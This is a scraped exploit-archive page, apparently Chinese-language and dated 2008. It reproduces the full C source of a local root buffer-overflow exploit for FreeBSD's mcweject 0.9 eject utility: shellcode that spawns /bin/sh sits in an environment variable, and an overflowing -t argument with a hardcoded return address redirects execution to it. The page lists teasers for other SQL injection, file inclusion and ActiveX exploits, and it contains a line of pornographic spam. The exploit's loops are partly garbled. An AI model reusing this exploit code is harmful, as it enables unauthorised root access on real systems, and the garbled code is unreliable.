FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

互聯網 發(fā)布時間：2008-10-08 21:03:44 作者：佚名

// ejecsploit.c - local root exploit for bsd's eject.c // harry // vuln found by kokanin (you 31337!!! ;)) // thanks to sacrine and all the other netric guys!!! you rule :) #include <stdio.h> #include <stdlib.h>

// ejecsploit.c - local root exploit for bsd's eject.c
// harry
// vuln found by kokanin (you 31337!!! ;))
// thanks to sacrine and all the other netric guys!!! you rule :)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define LEN 1264
#define NOP 0x90

extern char** environ;

int main(){

char buf[LEN];
char* ptr;
char* arg[4];
unsigned int ret, i;
char shellcode[]="\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd"
"\x80\xe8\xe4\xff\xff\xff/bin/sh";
// hardcoded... too boneidle to fix this
ret = 0xbfbfee16;
char envshell[4096];
ptr = envshell;
for (i = 0; i < 4096 - strlen(shellcode) - 1; i ) *(ptr ) = NOP;
for (i = 0; i < strlen(shellcode); i ) *(ptr ) = shellcode;
*(ptr) = 0x0;
memcpy (envshell, "BLEH=",5);
putenv(envshell);

memset (buf, 0x41, sizeof(buf));
buf[LEN-5] = (char) ( 0x000000ff & ret);
buf[LEN-4] = (char) ((0x0000ff00 & ret) >> 8);
buf[LEN-3] = (char) ((0x00ff0000 & ret) >> 16);
buf[LEN-2] = (char) ((0xff000000 & ret) >> 24);
buf[LEN-1] = 0x0;

arg[0] = "/usr/local/sbin/eject";
arg[1] = "-t";
arg[2] = buf;
arg[3] = NULL;

execve (arg[0], arg, environ);

return 0;
}

終端技巧終端機常見繞過沙盤方法
昨晚跟@Sunshine 請教了下終端機的玩法，順便翻了翻資料。總結了以下的幾種方法
2013-06-19
Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== =============
2008-10-08
File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
| File Store PRO 3.2 Blind SQL Injection | |________________________________________| Download from: http://upoint.info/cgi/demo/fs/filestore.zip
2008-10-08
Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerabi
##################################################################### # # Facebook Newsroom Application Remote File Inclusion Vulnerability # ######
2008-10-08
DreamNews Manager (id) Remote SQL Injection Vulnerability
######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #================================
2008-10-08
gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulner
2008-10-08
phpDatingClub (website.php page) Local File Inclusion Vulnerabilit
######################################################### # # phpDatingClub Local File Include Vulnerability #=====================================
2008-10-08
Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Expl
<html> <body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /> </object> <script language=javascript
2008-10-08
Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
<?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: http://www.quicksilverforums.com/ . . author: irk4z[
2008-10-08
IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be
2008-10-08

欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

相關文章

最新評論

文章分類

大家感興趣的內容

最近更新的內容